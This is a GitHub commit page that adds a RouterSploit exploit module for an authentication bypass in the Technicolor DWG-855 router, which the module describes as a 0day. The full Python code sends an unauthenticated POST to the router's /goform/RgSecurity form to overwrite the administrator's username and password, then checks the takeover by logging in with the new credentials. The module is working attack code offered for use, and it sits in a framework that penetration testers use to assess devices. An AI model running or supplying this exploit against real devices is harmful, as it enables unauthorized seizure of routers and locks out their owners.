Create dwg855_authbypass.py

ca1f5377 · 0BuRner · GitHub · ab799818 · ca1f5377
Commit ca1f5377 authored Nov 13, 2016 by 0BuRner Committed by GitHub Nov 13, 2016
Show whitespace changes
Inline Side-by-side

Showing with 66 additions and 0 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +66 -0

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+import base64
+
+from routersploit import(
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+    http_request,
+    mute
+)
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
+    If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
+    """
+    __info__ = {
+        'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.',
+        'authors': [
+            'JPaulMora',  # vulnerability discovery
+            'JPaulMora <https://JPaulMora.GitHub.io>',  # routersploit module
+        ],
+        'references': [
+            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
+        ],
+        'targets': [
+            'Technicolor DWG-855',
+        ]
+    }
+
+    target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1')
+    port = exploits.Option(80, 'Target Port')
+    nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
+    npass = exploits.Option('rpass', 'Overwrite old password with.. ')
+
+    def run(self):
+        url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
+        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
+        data = {"HttpUserId":self.nuser, "Password":self.npass, "PasswordReEnter":self.npass, "RestoreFactoryNo":"0x00"}
+
+        response = http_request(method="POST", url=url, headers=headers, data=data)
+        return ""
+
+    @mute
+    def check(self):
+        url = sanitize_url("{}:{}/RgConnect.asp".format(self.target, self.port))
+        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
+        authorization = 'Basic {}'.format(base64.b64encode(self.nuser + ':' + self.npass))
+        headers = {'User-Agent': user_agent,
+                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
+                   'Connection': 'keep-alive',
+                   'Accept-Encoding': 'gzip, deflate',
+                   'Authorization': authorization,
+                   'Cache-Control': 'no-cache',
+                   'Connection': 'close'}
+
+        response = http_request(method="GET", url=url, headers=headers)
+
+        if response is None:
+            return False  # target is not vulnerable
+        if response.status_code == 401:
+            return False  # target is not vulnerable
+        else:
+            return True  # device is vulnerable